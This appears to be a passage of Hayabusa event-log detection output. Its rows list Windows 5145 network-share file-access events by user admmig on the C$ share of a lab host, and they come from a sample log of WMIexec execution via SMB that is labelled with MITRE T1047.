+2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce#\f05e09fe4c0d9354867afe11b4e9db8c : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\89e812888a4e94f1d2bf0da1c4c6ee5b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb#\f3228ac51b37737ae2ce1176bbbad2ce : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#\cabc62ca2a04f99fe9af65799a727687 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\1617c5f47d154a5d7cf1f53851398006 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\19b334bb62b3c76cfcc7137bb03371c3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b#\822ee6a8aa9386352052b7bd2610f3b5 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62#\ab00f4aa6892c4c6d39b87f078e8208f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b#\93b57911ae369118b40a5605c448eb9d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777#\b090c87f42b1af785a6a9d1c43c201c6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c#\c59f97903ad4de423586f3a75eb8939d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04#\f6f9e39cc765b7ceda89fc7893e0f74c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749#\7ddbc8b883fb594b4efd9f4b016a4657 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0#\54486a01e573ae88df2c9fc21771e5ef : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0#\29e4fb69d6e2ff119c3e89fe9f23ea71 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207#\e998cb40c6a3657a6090a653616ee0d2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556#\2da102d7caf13b4e082aabda839cabfd : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc#\05a925477e72821ff9fa9527061d8527 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c#\9543db50e278526c3ba397cf5c7862cb : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9#\1834f24e507a831c635b80067fc7a428 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4#\f98240dfe778b4b39045d17817485b8a : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9#\bb434af0d1c0846eba8f3fc7986a5cdc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\b59fee046dfa048ec5f5180dc88f835d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f#\07b01287acdaf4ef356c3918db535afd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591#\a45750f13b28bdd0fb2adff38d6cd46f : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439#\fdcc95e5c05a2fec4f9c33b7e325ccd8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC\999abcb4ea322b606c8f211d12ccb5a0 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4#\f5bca9052007da4e51412dc152a52942 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884#\26a1a0abca839c13b1337a076531d7a2 : IP Address: 
